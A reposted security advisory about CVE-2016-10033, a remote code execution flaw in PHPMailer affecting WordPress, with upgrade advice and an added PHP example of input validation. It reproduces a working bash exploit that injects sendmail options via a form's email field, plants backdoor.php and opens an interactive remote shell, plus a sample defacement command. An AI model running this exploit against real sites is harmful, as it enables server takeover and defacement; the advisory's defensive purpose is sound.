Widely used email component PHPMailer has a remote code execution vulnerability - vulnerability warning - the black bar safety net

ID MYHACK58:62201682463
Type myhack58
Reporter Anonymous
Modified 2016-12-28T00:00:00


Polish researcher Dawid Golunski recently discovered a serious remote code execution vulnerability in PHPMailer. The vulnerability was published yesterday on legalhackers.com, but without exploit details or a proof of concept. Unfortunately, a few hours ago a proof of concept was released on exploit-db and GitHub that demonstrates how to exploit the vulnerability in the PHPMailer library, though for security reasons not against any specific web application that uses it. We had originally planned to publish this as a scheduled update, to give PHP developers and our community advance warning of the problem, but we expect that as more developers, and more people with bad intentions, look at the proof-of-concept code above, this event will keep developing.

PHPMailer is the core component WordPress uses to send email. You can find the code in the core file wp-includes/class-smtp.php.

Don't panic

Note: there is currently no public exploit code against WordPress core or any WordPress theme or plugin. The only exploit we have seen is the one the researcher verified against his own application to demonstrate that the vulnerability exists in PHPMailer (shown below). Please do not contact the WordPress core team, the WordPress forum moderators or anyone else to tell them "your WordPress site is exploitable"; this would only cause unnecessary panic.

Research is still ongoing. We are giving you advance notice of the problem for two main reasons:

1. From a user's perspective, once a fix is released you can be ready to upgrade WordPress core and any other affected themes and plugins.
2. From a developer's perspective, if you use a version of PHPMailer that contains this vulnerability, you can start fixing your code so that a fix reaches your users as soon as possible.

Vulnerability details

If you are not familiar with RCE vulnerabilities: they are the worst case.
The most critical vulnerabilities in WordPress history have been remote code execution vulnerabilities, which allow an attacker to run their own code on the victim's site and take control of the entire site. We took a brief look at the affected code in PHPMailer. To exploit this vulnerability, the attacker appears to need control over the sender's email address. The vulnerable PHPMailer code and the fix are shown in the following fragment:

(Image: vulnerable and fixed PHPMailer code fragment. Source: GitHub)

A Docker environment that reproduces this PHPMailer vulnerability, together with the PoC exploit script:

#!/bin/bash

# CVE-2016-10033 exploit by opsxcq
# Submits a crafted sender address so that sendmail's -X option writes a PHP
# backdoor into the web root, then drives that backdoor interactively.

echo '[+] CVE-2016-10033 exploit by opsxcq'

if [ -z "$1" ]
then
    echo '[-] Please inform a host as parameter'
    exit 1
fi

host=$1

echo '[+] Exploiting '$host

# The "email" form field is the injection point: the tokens -OQueueDirectory=/tmp
# and -X/www/backdoor.php end up parsed by sendmail as its own options.
curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35the' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35the\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35the\r\nContent-Disposition: form-data; name="name"\r\n\r\n\r\n------WebKitFormBoundaryzXJpHSq4mNy35the\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35the\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35the--\r\n' >/dev/null && echo '[+] Target exploited, accessing shell at http://'$host'/backdoor.php'

# Interactive loop: each command is base64-encoded into the cmd parameter and the
# backdoor's reply (the text between '|' separators) is base64-decoded and printed.
cmd='whoami'
while [ "$cmd" != 'exit' ]
do
    echo '[+] Running '$cmd
    curl -sq "http://$host/backdoor.php?cmd=$(echo -ne "$cmd" | base64)" | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d
    echo
    read -p 'RemoteShell> ' cmd
done
echo '[+] Exiting'

To exploit this target, just run:

./exploit host:port

If you are using the vulnerable image, you can just run:

./exploit localhost:8080

After exploitation, a file called backdoor.php will be stored in the root folder of the web directory, and the exploit will drop you into a shell where you can send commands to the backdoor:

./exploit localhost:8080
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting localhost:8080
[+] Target exploited, accessing shell at http://localhost:8080/backdoor.php
[+] Running whoami
www-data
RemoteShell> echo 'Defaced' > /www/index.php
[+] Running echo 'Defaced' > /www/index.php

(Image: PHPMailer authentication screenshot)

How to deal with it

We will send subscribers and customers an email warning. The WordPress core team is currently working on a hotfix that will be included in a WordPress core security release. There is no exact release time yet, but they will try to ship it within 24 hours. Once it is released, please upgrade WordPress core as soon as possible.

If your own PHP application, theme or plugin uses a version of PHPMailer earlier than 5.2.18, please upgrade to PHPMailer 5.2.18 or later immediately. If you are a WordPress theme or plugin developer and your plugin or theme bundles a copy of an earlier PHPMailer version, you need to update it to PHPMailer 5.2.18 or newer immediately and release the revised version to your customers.

Vulnerability history timeline

1. Some time ago there was a discussion on a WordPress core issue that included a hotfix for this problem: updating the PHPMailer used by WP core from 5.2.14 to 5.2.19. But this is only a suggested patch, not the official final fix.
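The vulnerability details above say the attacker needs to control the sender address, and the fix section says to move to PHPMailer 5.2.18 or later. The following added example (written for this page; it is neither PHPMailer's code nor the PoC author's) shows why the sender value submitted by the exploit is dangerous and what a 5.2.18-style guard rejects. It reuses the exact "email" field value from the exploit above, rebuilds the `-f` parameter the way PHPMailer's mail() transport does, and includes a check modeled on the isShellSafe() guard introduced in PHPMailer 5.2.18 (Linux form only). The function names sendmailArgv, isShellSafe and safeSendmailParams are this example's own; it never calls mail(), so it runs offline.

```php
<?php
// Added example for this page, not PHPMailer's own code.

// Constructed input: the sender address the exploit script above submits
// in the "email" form field.
$maliciousSender = 'vulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php';

// PHPMailer's mail() transport hands mail() a fifth argument of the form
// "-f<sender>". PHP passes that argument through escapeshellcmd() and then
// appends it to the sendmail command line, which a shell splits on whitespace.
// escapeshellcmd() escapes shell metacharacters but leaves spaces alone, so
// extra tokens in the address survive as separate sendmail arguments.
// This function reproduces that argv (approximating the shell's word split).
function sendmailArgv(string $sender): array
{
    $params  = sprintf('-f%s', $sender);
    $escaped = escapeshellcmd($params);
    return array_merge(['/usr/sbin/sendmail', '-t', '-i'], preg_split('/\s+/', $escaped));
}

// Modeled on PHPMailer 5.2.18 isShellSafe(): refuse any value that
// escapeshellcmd()/escapeshellarg() would alter, and anything outside a
// conservative character set, so no shell or sendmail option syntax gets through.
function isShellSafe(string $string): bool
{
    if (escapeshellcmd($string) !== $string || escapeshellarg($string) !== "'$string'") {
        return false;
    }
    return (bool) preg_match('/\A[A-Za-z0-9@_.-]+\z/', $string);
}

// Hardened construction of the -f parameter: validate the address as an email
// address first, then apply the shell-safety guard; return null rather than
// passing anything suspicious on to mail().
function safeSendmailParams(string $sender): ?string
{
    if (filter_var($sender, FILTER_VALIDATE_EMAIL) === false || !isShellSafe($sender)) {
        return null;
    }
    return '-f' . $sender;
}

// Show the injected options as sendmail would receive them.
print_r(sendmailArgv($maliciousSender));

// The guard rejects the exploit value and accepts an ordinary address.
var_dump(safeSendmailParams($maliciousSender));
var_dump(safeSendmailParams('alice@example.org'));
```

Run it with `php example.php`. The first call lists `-OQueueDirectory=/tmp` and `-X/www/backdoor.php` as their own argv entries after `-fvulnerables@`, which is exactly how sendmail ends up writing its `-X` trace log (containing the attacker-supplied message body) into the web root. The guard returns null for that value and only builds the `-f` parameter for the plain address.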
